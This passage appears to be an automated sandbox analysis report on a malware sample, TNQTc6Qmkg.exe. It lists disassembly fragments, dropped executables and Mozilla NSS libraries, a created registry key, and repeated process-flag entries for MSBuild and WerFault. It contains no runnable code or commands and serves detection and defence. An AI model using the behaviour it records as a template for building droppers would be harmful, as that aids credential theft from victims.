                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0042780C push eax; ret 0_2_0042782A
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0042E3A5 push esi; ret 0_2_0042E3AE
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00409D06 push ecx; ret 0_2_00409D19
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_004097B6 push ecx; ret 0_2_004097C9
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_042674D3 pushad ; retf 0_2_042674D4
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_04268568 push ecx; iretd 0_2_0426856E
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_04269D81 pushad ; retf 0_2_04269D88
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0426B7F3 push ebp; iretd 0_2_0426B826
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_04269A6B push 2B991403h; ret 0_2_04269A72
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0426A391 push 00000061h; retf 0_2_0426A399
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CF9F6D push ecx; ret 0_2_05CF9F80
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D0C9FD push esp; retf 0_2_05D0C9FE
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D0C3FF push esp; retf 0_2_05D0C407
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D11B72 push dword ptr [esp+ecx-75h]; iretd 0_2_05D11B76
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05D17A73 push eax; ret 0_2_05D17A91
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_05CF9A1D push ecx; ret 0_2_05CF9A30
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004176C5 push ecx; ret 1_2_004176D8
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6B0AB536 push ecx; ret 1_2_6B0AB549
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0009281F push esp; retn 0022h5_2_00092820
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_00091088 push esp; retn 0022h5_2_00091089
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_001EFAB6 push ecx; ret 5_2_001EFAC9
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_001EFB55 push ecx; ret 5_2_001EFB68
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_00091DA3 push esp; retn 0022h5_2_00091DA4
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_000A0F0B push 8B0025D1h; retf 5_2_000A0F10
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0008EF7F push esp; retf 0022h5_2_0008EF80
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeCode function: 5_2_0008EFA7 push eax; retf 0022h5_2_0008EFA8
                              Source: osssciedmed.6.drStatic PE information: section name: .text entropy: 6.816444465715168
                              Source: bxhlahunbhc.14.drStatic PE information: section name: .text entropy: 6.816444465715168
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile created: C:\Users\user\AppData\Local\Temp\u3bs.3.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile created: C:\Users\user\AppData\Local\Temp\u3bs.0.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bxhlahunbhcJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\osssciedmedJump to dropped file
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile created: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile created: C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dllJump to dropped file
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile created: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\osssciedmedJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bxhlahunbhcJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\OSSSCIEDMED
                              Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BXHLAHUNBHC
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408761
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
